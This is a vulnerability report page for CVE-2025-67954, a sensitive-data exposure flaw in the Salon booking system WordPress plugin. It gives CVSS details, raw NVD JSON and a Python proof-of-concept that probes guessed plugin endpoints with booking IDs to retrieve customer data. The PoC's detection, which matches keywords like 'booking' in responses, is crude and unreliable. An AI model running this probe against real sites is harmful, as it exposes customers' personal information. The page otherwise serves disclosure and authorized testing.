Security Vulnerability Report
中文
CVE-2025-67954 CVSS 6.5 MEDIUM

CVE-2025-67954

Published: 2026-01-22 17:16:05
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Dimitri Grassi Salon booking system salon-booking-system allows Retrieve Embedded Sensitive Data.This issue affects Salon booking system: from n/a through <= 10.30.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Salon booking system (WordPress插件) <= 10.30.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67954 PoC - Salon Booking System Sensitive Data Exposure # This PoC demonstrates the information disclosure vulnerability import requests import json import sys from urllib.parse import urljoin def exploit_salon_booking(cve_url, target_url): """ Exploit for CVE-2025-67954: Salon Booking System Sensitive Data Exposure Target: WordPress plugin salon-booking-system <= 10.30.3 """ print(f"[*] Target: {target_url}") print(f"[*] CVE: CVE-2025-67954") print("[*] Vulnerability: Sensitive Information Disclosure via Insecure Direct Object Reference\n") # Common vulnerable endpoints in Salon Booking System vulnerable_endpoints = [ "/?sln_action=ajax&sln_method=getBookingData", "/wp-admin/admin-ajax.php", "/?rest_route=/salon/v1/bookings", "/wp-json/salon/v1/" ] # Step 1: Identify WordPress and Salon Booking installation print("[Step 1] Identifying target installation...") response = requests.get(target_url, timeout=10) if 'salon' in response.text.lower() or 'booking' in response.text.lower(): print("[+] Salon Booking System detected") # Step 2: Test for information disclosure print("\n[Step 2] Testing for sensitive data exposure...") # Example: Attempt to access booking data without proper authorization test_payloads = [ {"booking_id": "1"}, {"id": "1"}, {"post_id": "1"}, {"action": "get_data", "type": "booking"} ] for endpoint in vulnerable_endpoints: full_url = urljoin(target_url, endpoint) for payload in test_payloads: try: # Test GET request r = requests.get(full_url, params=payload, timeout=10) if r.status_code == 200 and check_response(r.text): print(f"[+] Potential vulnerability found at: {full_url}") print(f"[+] Response contains sensitive data: {r.text[:200]}...") return True # Test POST request r = requests.post(full_url, data=payload, timeout=10) if r.status_code == 200 and check_response(r.text): print(f"[+] Potential vulnerability found at: {full_url}") print(f"[+] Response contains sensitive data: {r.text[:200]}...") return True except Exception as e: print(f"[-] Error testing {full_url}: {e}") print("\n[!] No obvious vulnerability detected. Manual testing recommended.") return False def check_response(text): """Check if response contains sensitive information patterns""" sensitive_patterns = [ 'email', 'phone', 'address', 'customer', 'booking', 'personal', 'ssn', 'credit', 'password', 'api_key' ] text_lower = text.lower() return any(pattern in text_lower for pattern in sensitive_patterns) if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_67954_poc.py <target_url>") print("Example: python cve_2025_67954_poc.py http://example.com/") sys.exit(1) target = sys.argv[1] exploit_salon_booking("CVE-2025-67954", target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67954", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:04.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Dimitri Grassi Salon booking system salon-booking-system allows Retrieve Embedded Sensitive Data.This issue affects Salon booking system: from n/a through <= 10.30.3."}, {"lang": "es", "value": "Vulnerabilidad de Exposición de Información Sensible del Sistema a una Esfera de Control No Autorizada en el sistema de reservas de Dimitri Grassi Salon salon-booking-system permite Recuperar Datos Sensibles Incrustados. Este problema afecta al sistema de reservas de Salon: desde n/a hasta &lt;= 10.30.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/salon-booking-system/vulnerability/wordpress-salon-booking-system-plugin-10-30-3-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.